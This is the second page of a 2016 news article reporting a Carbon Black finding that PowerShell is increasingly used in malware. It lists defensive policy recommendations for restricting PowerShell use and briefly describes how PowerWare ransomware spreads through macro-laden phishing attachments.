Subscribe / Unsubscribe Enewsletters | Login | Register

Pencil Banner

Power Shell is a powerful malware tool

Tim Greene | April 14, 2016
CarbonBlack: Use of the scripting language in malware is on the rise.

The report recommends setting standards for how PowerShell should be used:

  • Change ExecutionPolicy to only allow signed scripts to run.
  • Require all PowerShell scripts to be run from a specific location or path.
  • Discourage (or require exception for) the use of encoded parameters on the command line.
  • Discourage (or block) PowerShell scripts from downloading content from the Internet (or specify a “whitelist” of allowed IP addresses only).
  • Discourage (or block) the use of PowerShell to invoke commands on remote systems.
  • Require a custom parameter to be passed on all “legitimate” PowerShell usage.
  • Restrict PowerShell to specific users in your organization.
  • Require PowerShell to be launched from a specific process.

A relatively new iteration of ransomware called PowerWare is an example of PowerShell used maliciously. Distributed mainly via phishing attacks, PowerWare initiates as macros within emailed Word attachments. The macros launch an .exe file that starts up two PowerShell instances, one to download the ransomware script and the other to implement it.

PowerShell gives the attacker freedom of movement within the compromised network. “You become an employee of your target,” Johnson says.


Previous Page  1  2 

Sign up for Computerworld eNewsletters.